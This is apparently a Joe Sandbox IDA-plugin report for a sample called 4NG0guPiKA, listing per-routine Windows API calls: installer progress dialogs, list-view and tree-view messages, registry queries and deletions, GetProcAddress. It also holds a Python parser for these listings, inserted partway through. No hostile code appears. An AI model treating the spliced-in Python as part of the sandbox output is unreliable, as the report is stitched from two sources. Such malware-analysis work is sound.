• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
• Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
• Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
• Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
• GetMessagePos.USER32 ref: 00404A81
• ScreenToClient.USER32(?,?), ref: 00404A9B
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
• Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
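The SendMessageW arguments listed for the routine at 00405194 (list-view messages 0x1004, 0x104D, 0x1013) and for the routine at 00404A79 (tree-view messages 0x110A, 0x1111, 0x113E) only become readable once the message IDs are resolved. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the report's own API-listing format (the `• Function.MODULE(args), ref: ADDR` bullets, including the indented `Part of subcall function` entries) and decodes the common-control messages with the public commctrl.h values (LVM_FIRST = 0x1000, TVM_FIRST = 0x1100). The sample listing is constructed by copying lines from the two blocks above; the name tables are assumptions taken from the public header, not something the report supplies. The decoded output shows the first routine appending an entry to a list-view log (LVM_GETITEMCOUNT, LVM_INSERTITEMW, LVM_ENSUREVISIBLE) and the second reading the caret item of a tree view and hit-testing the last mouse position (TVM_GETNEXTITEM with TVGN_CARET, TVM_HITTEST, TVM_GETITEMW).

```python
"""Parse and decode Joe Sandbox IDA-plugin API listings.

Added example, not part of the Joe Sandbox report. Message and flag
names are the public commctrl.h values; the sample listing below is
constructed from lines copied out of the report blocks above.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# One listing line: optional "Part of subcall function XXXX:" prefix,
# then Function.MODULE, optional "(args)", then ", ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<fn>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

LVM_FIRST, TVM_FIRST = 0x1000, 0x1100
MSG_NAMES = {
    LVM_FIRST + 4: "LVM_GETITEMCOUNT",
    LVM_FIRST + 19: "LVM_ENSUREVISIBLE",
    LVM_FIRST + 77: "LVM_INSERTITEMW",
    TVM_FIRST + 10: "TVM_GETNEXTITEM",
    TVM_FIRST + 17: "TVM_HITTEST",
    TVM_FIRST + 62: "TVM_GETITEMW",
}
# wParam of TVM_GETNEXTITEM selects which item is returned (TVGN_* codes).
TVGN_NAMES = {0: "TVGN_ROOT", 1: "TVGN_NEXT", 2: "TVGN_PREVIOUS", 3: "TVGN_PARENT",
              4: "TVGN_CHILD", 5: "TVGN_FIRSTVISIBLE", 6: "TVGN_NEXTVISIBLE",
              7: "TVGN_PREVIOUSVISIBLE", 8: "TVGN_DROPHILITE", 9: "TVGN_CARET"}


@dataclass
class ApiCall:
    fn: str
    module: str
    args: List[Optional[int]]   # hex literal -> int, "?" (unknown) -> None
    ref: int                    # address of the call instruction
    subcall_of: Optional[int]   # callee address when the line is a subcall entry


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)


def parse_listing(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an 'APIs' block into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as 'APIs' or 'Strings'
        args = [] if m["args"] is None else [_parse_arg(t) for t in m["args"].split(",")]
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["fn"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def direct_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls made by the function itself, excluding 'Part of subcall' lines."""
    return [c for c in calls if c.subcall_of is None]


def _fmt(a: Optional[int]) -> str:
    return "?" if a is None else f"0x{a:X}"


def describe(call: ApiCall) -> str:
    """Render one call, naming common-control messages where the ID is known."""
    if call.fn == "SendMessageW" and len(call.args) == 4 and call.args[1] is not None:
        msg, wp, lp = call.args[1], call.args[2], call.args[3]
        name = MSG_NAMES.get(msg, f"0x{msg:04X}")
        wp_txt = TVGN_NAMES.get(wp, _fmt(wp)) if msg == TVM_FIRST + 10 else _fmt(wp)
        return f"{call.ref:08X}: SendMessageW(hwnd, {name}, wParam={wp_txt}, lParam={_fmt(lp)})"
    return f"{call.ref:08X}: {call.fn}.{call.module}({', '.join(_fmt(a) for a in call.args)})"


# Constructed sample: lines copied from the two routines discussed above.
SAMPLE = """\
• lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
• SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
• GetTickCount.KERNEL32 ref: 00402D53
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
"""

if __name__ == "__main__":
    for c in direct_calls(parse_listing(SAMPLE)):
        print(describe(c))
```

Extend MSG_NAMES with further commctrl.h values as needed; unknown IDs are left as hex so nothing is mislabelled, and `?` arguments (values the plugin could not recover statically) stay `?` in the output.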
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
• wsprintfW.USER32 ref: 00402CD1
• SetWindowTextW.USER32(?,?), ref: 00402CE1
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
• Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
• Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
• Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
APIs
• wsprintfW.USER32 ref: 100024E1
• StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
  • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,774CFFC0,100011AA,?,00000000), ref: 1000131E
• GlobalFree.KERNEL32(?), ref: 10002559
• GlobalFree.KERNEL32(00000000), ref: 10002582
Memory Dump Source
• Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
Similarity
• API ID: FreeGlobal$FromStringlstrcpywsprintf
• String ID:
• API String ID: 2435812281-0
• Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
• Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
• Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
• Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
APIs
  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
• GlobalFree.KERNEL32(?), ref: 10001928
• GlobalFree.KERNEL32(?), ref: 10001AB9
• GlobalFree.KERNEL32(?), ref: 10001ABE
Memory Dump Source
• Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
Similarity
• API ID: FreeGlobal$lstrcpy
• String ID:
• API String ID: 176019282-0
• Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
• Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
• Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
• Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                            • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                            • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                            • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                            • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1148316912-0
                                                                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                            • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                            • Opcode Fuzzy Hash: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                            • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D44
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                            • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                            • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                            • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                            • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                            • wsprintfW.USER32 ref: 00404A12
                                                                                                            • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                            • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                            • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                            • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                            • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                            • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                            • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3677997916-1824292864
                                                                                                            • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                            • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                                                            • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                            • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 0040593B
